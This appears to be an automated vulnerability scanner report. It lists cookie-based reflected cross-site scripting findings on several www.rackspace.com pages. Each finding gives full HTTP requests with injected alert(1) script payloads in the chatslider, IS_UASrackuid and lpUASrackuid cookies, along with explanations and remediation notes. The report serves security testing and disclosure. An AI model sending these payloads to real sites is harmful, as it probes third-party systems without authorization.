GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c8826"%3balert(1)//f82e40c950a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab573"%3balert(1)//25e526adf65 was submitted in the chatslider cookie. This input was echoed as ab573";alert(1)//25e526adf65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dab573"%3balert(1)//25e526adf65; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e899a"><script>alert(1)</script>03f8f1f368 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De899a"><script>alert(1)</script>03f8f1f368; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a67"><script>alert(1)</script>b6f54d93f29 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f825a67"><script>alert(1)</script>b6f54d93f29; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1754c"%3balert(1)//d5a8556ffcb was submitted in the IS_UASrackuid cookie. This input was echoed as 1754c";alert(1)//d5a8556ffcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81754c"%3balert(1)//d5a8556ffcb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 48752
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37330"><script>alert(1)</script>7ee8dff4075 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D37330"><script>alert(1)</script>7ee8dff4075; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2172"%3balert(1)//30e27f0efc8 was submitted in the chatslider cookie. This input was echoed as c2172";alert(1)//30e27f0efc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc2172"%3balert(1)//30e27f0efc8; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a6b"><script>alert(1)</script>4c3182f828b was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c5a6b"><script>alert(1)</script>4c3182f828b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f363"%3balert(1)//61f905e706c was submitted in the IS_UASrackuid cookie. This input was echoed as 2f363";alert(1)//61f905e706c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f82f363"%3balert(1)//61f905e706c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 66637
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb86"%3balert(1)//aa7e9c65c0f was submitted in the chatslider cookie. This input was echoed as 3eb86";alert(1)//aa7e9c65c0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3eb86"%3balert(1)//aa7e9c65c0f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bd7"><script>alert(1)</script>eeb60002408 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D44bd7"><script>alert(1)</script>eeb60002408; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3549"><script>alert(1)</script>c2105beaa0e was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
